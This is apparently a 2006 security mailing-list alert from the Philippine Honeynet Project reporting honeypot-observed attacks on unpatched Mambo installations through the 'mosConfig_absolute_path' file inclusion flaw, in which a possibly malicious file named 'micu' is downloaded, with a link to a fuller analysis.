We have been receiving multiple attacks directed towards the popular
open source portal and content management system, Mambo. The attacks
makes use of the "mosConfig_absolute_path" file inclusion
vulnerability of certain unpatched versions of the said application.
In this case, a possibly malicious file called "micu" is downloaded in
the process of the attack.
Full analysis:
http://www.philippinehoneynet.org/data.php
Ryan Talabis
Lead Analyst
Philippine Honeynet Project
http://www.philippinehoneynet.org
-------------------------------------------------------------------------
This List Sponsored by: Watchfire
Watchfire's AppScan is the industry's first and leading web application
security testing suite, and the only solution to provide comprehensive
remediation tasks at every level of the application. See for yourself.
Download AppScan 6.0 today.
https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh
--------------------------------------------------------------------------
Received on Jan 15 2006
Intro
